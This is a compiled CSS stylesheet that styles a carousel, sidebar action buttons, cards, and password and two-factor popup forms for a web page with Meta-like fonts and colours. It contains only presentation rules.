.carousel .control-arrow,
.carousel.carousel-slider .control-arrow {
    background: none;
    border: 0;
    cursor: pointer;
    filter: alpha(opacity=40);
    font-size: 32px;
    opacity: .4;
    position: absolute;
    top: 20px;
    transition: all .25s ease-in;
    z-index: 2
}

.carousel .control-arrow:focus,
.carousel .control-arrow:hover {
    filter: alpha(opacity=100);
    opacity: 1
}

.carousel .control-arrow:before,
.carousel.carousel-slider .control-arrow:before {
    border-bottom: 8px solid #0000;
    border-top: 8px solid #0000;
    content: "";
    display: inline-block;
    margin: 0 5px
}

.carousel .control-disabled.control-arrow {
    cursor: inherit;
    display: none;
    filter: alpha(opacity=0);
    opacity: 0
}

.carousel .control-prev.control-arrow {
    left: 0
}

.carousel .control-prev.control-arrow:before {
    border-right: 8px solid #fff
}

.carousel .control-next.control-arrow {
    right: 0
}

.carousel .control-next.control-arrow:before {
    border-left: 8px solid #fff
}

.carousel-root {
    outline: none
}

.carousel {
    position: relative;
    width: 100%
}

.carousel * {
    box-sizing: border-box
}

.carousel img {
    display: inline-block;
    pointer-events: none;
    width: 100%
}

.carousel .carousel {
    position: relative
}

.carousel .control-arrow {
    background: none;
    border: 0;
    font-size: 18px;
    margin-top: -13px;
    outline: 0;
    top: 50%
}

.carousel .thumbs-wrapper {
    margin: 20px;
    overflow: hidden
}

.carousel .thumbs {
    list-style: none;
    position: relative;
    transform: translateZ(0);
    transition: all .15s ease-in;
    white-space: nowrap
}

.carousel .thumb {
    border: 3px solid #fff;
    display: inline-block;
    margin-right: 6px;
    overflow: hidden;
    padding: 2px;
    transition: border .15s ease-in;
    white-space: nowrap
}

.carousel .thumb:focus {
    border: 3px solid #ccc;
    outline: none
}

.carousel .thumb.selected,
.carousel .thumb:hover {
    border: 3px solid #333
}

.carousel .thumb img {
    vertical-align: top
}

.carousel.carousel-slider {
    margin: 0;
    overflow: hidden;
    position: relative
}

.carousel.carousel-slider .control-arrow {
    bottom: 0;
    color: #fff;
    font-size: 26px;
    margin-top: 0;
    padding: 5px;
    top: 0
}

.carousel.carousel-slider .control-arrow:hover {
    background: #0003
}

.carousel .slider-wrapper {
    margin: auto;
    overflow: hidden;
    transition: height .15s ease-in;
    width: 100%
}

.carousel .slider-wrapper.axis-horizontal .slider {
    -ms-box-orient: horizontal;
    display: -moz-flex;
    display: flex
}

.carousel .slider-wrapper.axis-horizontal .slider .slide {
    flex-direction: column;
    flex-flow: column
}

.carousel .slider-wrapper.axis-vertical {
    -ms-box-orient: horizontal;
    display: -moz-flex;
    display: flex
}

.carousel .slider-wrapper.axis-vertical .slider {
    flex-direction: column
}

.carousel .slider {
    list-style: none;
    margin: 0;
    padding: 0;
    position: relative;
    width: 100%
}

.carousel .slider.animated {
    transition: all .35s ease-in-out
}

.carousel .slide {
    margin: 0;
    min-width: 100%;
    position: relative;
    text-align: center
}

.carousel .slide img {
    border: 0;
    vertical-align: top;
    width: 100%
}

.carousel .slide iframe {
    border: 0;
    display: inline-block;
    margin: 0 40px 40px;
    width: calc(100% - 80px)
}

.carousel .slide .legend {
    background: #000;
    border-radius: 10px;
    bottom: 40px;
    color: #fff;
    font-size: 12px;
    left: 50%;
    margin-left: -45%;
    opacity: .25;
    padding: 10px;
    position: absolute;
    text-align: center;
    transition: all .5s ease-in-out;
    transition: opacity .35s ease-in-out;
    width: 90%
}

.carousel .control-dots {
    bottom: 0;
    margin: 10px 0;
    padding: 0;
    position: absolute;
    text-align: center;
    width: 100%;
    z-index: 1
}

@media (min-width:960px) {
    .carousel .control-dots {
        bottom: 0
    }
}

.carousel .control-dots .dot {
    background: #fff;
    border-radius: 50%;
    box-shadow: 1px 1px 2px #000000e6;
    cursor: pointer;
    display: inline-block;
    filter: alpha(opacity=30);
    height: 8px;
    margin: 0 8px;
    opacity: .3;
    transition: opacity .25s ease-in;
    width: 8px
}

.carousel .control-dots .dot.selected,
.carousel .control-dots .dot:hover {
    filter: alpha(opacity=100);
    opacity: 1
}

.carousel .carousel-status {
    color: #fff;
    font-size: 10px;
    padding: 5px;
    position: absolute;
    right: 0;
    text-shadow: 1px 1px 1px #000000e6;
    top: 0
}

.carousel:hover .slide .legend {
    opacity: 1
}

* {
    font-family: Arial, Helvetica, sans-serif !important
}

#root {
    overflow: hidden
}

#main-component {
    background: #f9f1f9;
    background: linear-gradient(130deg, #f9f1f9, #eaf3fd 35%, #edfbf2);
    height: 100vh;
    overflow: hidden;
    overflow-y: scroll
}

#main-component #main {
    max-width: 1100px
}

.left {
    border-right: 1px solid #dee3e9
}

.left .left-content {
    height: 100vh;
    overflow-y: auto;
    padding: 40px 20px 0 0;
    position: sticky;
    position: -webkit-sticky;
    top: 0
}

::-webkit-scrollbar {
    width: 3px
}

::-webkit-scrollbar-thumb {
    background: #4a4a4a
}

::-webkit-scrollbar-track {
    background: #0000
}

.logo {
    margin: 0 auto;
    width: 70px
}

.logo svg {
    height: -webkit-min-content;
    height: min-content;
    width: 100%
}

h1,
h2 {
    color: #1c1e21;
    font-family: Optimistic Display Bold, Helvetica, Arial, sans-serif;
    font-weight: 700;
    line-height: 30px;
    margin: 16px 0
}

h1 {
    align-items: center;
    display: flex;
    font-size: 24px
}

h1 svg {
    margin-right: 8px
}

.action-button {
    align-items: center;
    background-color: inherit;
    border-radius: 15px;
    color: #000;
    cursor: pointer;
    display: flex;
    font-family: Optimistic Text Medium, Helvetica, Arial, sans-serif;
    font-size: 16px;
    font-weight: 500;
    line-height: 20px;
    padding: 12px 16px;
    transition: background-color .35s ease;
    width: 100%
}

.action-button.main {
    background-color: #344854;
    color: #fff
}

.action-button.main svg path {
    fill: #fff
}

.action-button .action-text {
    padding: 0 12px;
    text-align: left;
    width: 100%
}

.action-button .action-arrow svg,
.action-button .action-icon svg {
    height: 24px;
    width: 24px
}

.action-button:not(.main):hover {
    background-color: #e3e8ef
}

.content-action {
    height: 0;
    overflow: hidden;
    transition: .3s ease-in-out
}

.item-action.active .content-action {
    height: -webkit-max-content;
    height: max-content;
    transition: .3s ease-in-out
}

.item-action.active .action-arrow svg {
    transform: rotate(180deg)
}

.item-action.active .content-action .action-arrow svg {
    transform: rotate(0)
}

.content-right {
    padding: 40px 20px
}

p {
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif !important;
    line-height: 20px;
    margin: 0
}

h6,
p {
    font-size: 15px
}

h6 {
    font-weight: 600;
    margin-bottom: 20px
}

li {
    font-size: 15px;
    margin: 8px 0
}

.card-thumb {
    background-color: #fff;
    border-radius: 20px;
    display: flex;
    flex-direction: column;
    margin: 20px 0;
    overflow: hidden
}

.thumb-content {
    margin: 20px
}

.thumb-content .thumb-type {
    font-size: 16px;
    font-weight: 400;
    margin-bottom: 10px
}

.thumb-content h4 {
    font-weight: 500;
    margin: 14px 0
}

.btn-wrapper {
    padding: 20px 0 0
}

.btn-wrapper,
.button {
    display: flex;
    justify-content: center;
    width: 100%
}

.button {
    align-items: center;
    border-radius: 20px;
    cursor: pointer;
    height: 50px
}

.button.fb-blue {
    background-color: #0064e0;
    color: #fff
}

.action-button-list .action-icon img {
    height: 48px;
    width: 48px
}

.small-grey {
    color: #465a69;
    font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif;
    font-size: 15px;
    font-weight: 400;
    line-height: 20px
}

.action-button-list .action-button {
    background-color: #fff;
    border-radius: 0
}

.action-button-list .action-button .action-arrow svg {
    transform: rotate(-90deg)
}

.action-button-list .action-button.b-bottom {
    border-bottom: 1px solid #e3e8ef
}

.action-button-list {
    border-radius: 15px;
    overflow: hidden
}

.link-to {
    color: #0d6efd;
    cursor: pointer;
    display: inline;
    font-size: 15px;
    margin: 0 0 0 5px;
    text-decoration: none
}

.link-to:hover {
    text-decoration: underline
}

.link-to svg {
    height: 14px;
    margin-left: 3px;
    vertical-align: text-top;
    width: 14px
}

.link-to svg path {
    fill: #0d6efd;
    margin-left: 5px
}

.menu-mobile {
    align-items: center;
    display: flex;
    display: none;
    justify-content: space-between;
    padding: 10px
}

.item-button {
    background-color: #333;
    border-radius: 5px;
    height: 2px;
    margin: 5px 0;
    transition: .4s;
    width: 30px
}

.close-bar {
    align-items: end;
    cursor: pointer;
    display: flex;
    flex-direction: column
}

.close-bar .item-button.top {
    transform: rotate(-45deg) translate(-3px, 4px)
}

.close-bar .item-button.bottom {
    transform: rotate(45deg) translate(-5px, -6px)
}

.popup {
    align-items: center;
    background: #00000080;
    bottom: 0;
    display: flex;
    flex-direction: column;
    height: 100%;
    justify-content: center;
    left: 0;
    padding: 0;
    position: fixed;
    right: 0;
    top: 0;
    width: 100%;
    z-index: -1
}

.popup .popup-item {
    background: linear-gradient(90deg, #f9f1f9, #eaf3fd 35%, #edfbf2);
    border-radius: 25px;
    display: none;
    height: 100vh;
    margin: 15px;
    max-height: none;
    max-width: 500px;
    overflow-y: auto;
    padding: 20px;
    width: 95%
}

.popup.active {
    z-index: 9
}

.popup .popup-item.active {
    display: block
}

h4,
h5 {
    font-weight: 600
}

h5 {
    font-size: 1rem;
    line-height: 1.2;
    margin-bottom: .5rem;
    margin-top: 0
}

.popup .action-button-list .action-button .action-arrow svg {
    height: 20px;
    width: 20px
}

.popup-head {
    align-items: center;
    display: flex;
    justify-content: space-between;
    padding: .4rem 0
}

.popup-head .close-bar {
    border-radius: 25px;
    padding: .2rem
}

.popup-head .close-bar svg {
    height: 20px;
    width: 20px
}

.popup-head .close-bar:hover {
    background-color: #e2eaf2
}

form label {
    margin-bottom: .5rem
}

.ant-form-item {
    margin-bottom: 0
}

.item-form {
    margin-bottom: 1rem
}

.form-text {
    color: #6c757d;
    font-size: .875em;
    margin-top: .25rem
}

.ant-input {
    height: 50px
}

.ant-input,
.ant-input-affix-wrapper {
    border: 2px solid #d4dbe3;
    border-radius: 10px;
    padding: 0 11px
}

.ant-input-affix-wrapper input {
    background-color: initial
}

.ant-input-affix-wrapper:not(.ant-input-affix-wrapper-disabled):hover,
.ant-input:hover {
    border: 2px solid #d4dbe3
}

.ant-input-affix-wrapper:focus,
.ant-input-focused,
.ant-input:focus {
    border: 2px solid #d4dbe3;
    box-shadow: none
}

.ant-btn-default:not(:disabled):not(.ant-btn-disabled):hover {
    border-color: #4096ff;
    color: #fff
}

.button-send {
    background-color: #0d6efd;
    border-color: #0d6efd;
    border-radius: 25px;
    color: #fff;
    font-size: 20px;
    height: 50px;
    margin: 15px 0;
    position: relative;
    width: 100%
}

.button-send,
.popup-footer {
    align-items: center;
    display: flex;
    justify-content: center
}

.password-correct {
    color: red;
    display: none;
    font-size: 15px
}

.password-correct.active {
    display: block
}

.popup .popup-item.popup-pasword,
.popup .popup-item.popup-two-fa {
    display: flex;
    display: none;
    flex-direction: column;
    justify-content: space-between
}

.popup .popup-item.popup-pasword.active,
.popup .popup-item.popup-two-fa.active {
    display: block;
    display: flex
}

.popup .popup-item.popup-two-fa .popup-content,
.popup-pasword .popup-content {
    display: flex;
    flex-direction: column;
    height: 100%;
    justify-content: space-between
}

.popup-pasword .popup-content form,
.popup-two-fa .popup-content form {
    margin: auto 0
}

@media (max-width:1001px) {
    .col-8 {
        width: 100% !important
    }

    .menu-mobile {
        display: block;
        display: flex
    }

    .left.col-4 {
        display: none
    }

    .right .content-right {
        padding: 20px 5px
    }

    h1 svg {
        height: 50px !important;
        margin-right: 8px;
        width: 50px !important
    }
}

/*# sourceMappingURL=main.cdc5fc99.css.map*/